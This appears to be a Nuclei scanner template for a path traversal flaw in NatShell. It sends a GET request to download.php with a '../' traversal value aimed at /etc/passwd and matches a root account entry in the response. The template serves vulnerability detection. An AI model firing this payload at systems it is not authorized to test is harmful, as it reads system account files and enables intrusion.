id: natshell-path-traversal info: name: NatShell Path Traversal author: pikpikcu severity: high reference: - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw tags: natshell,lfi requests: - method: GET path: - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "toor:[x*]:0:0" - type: status status: - 200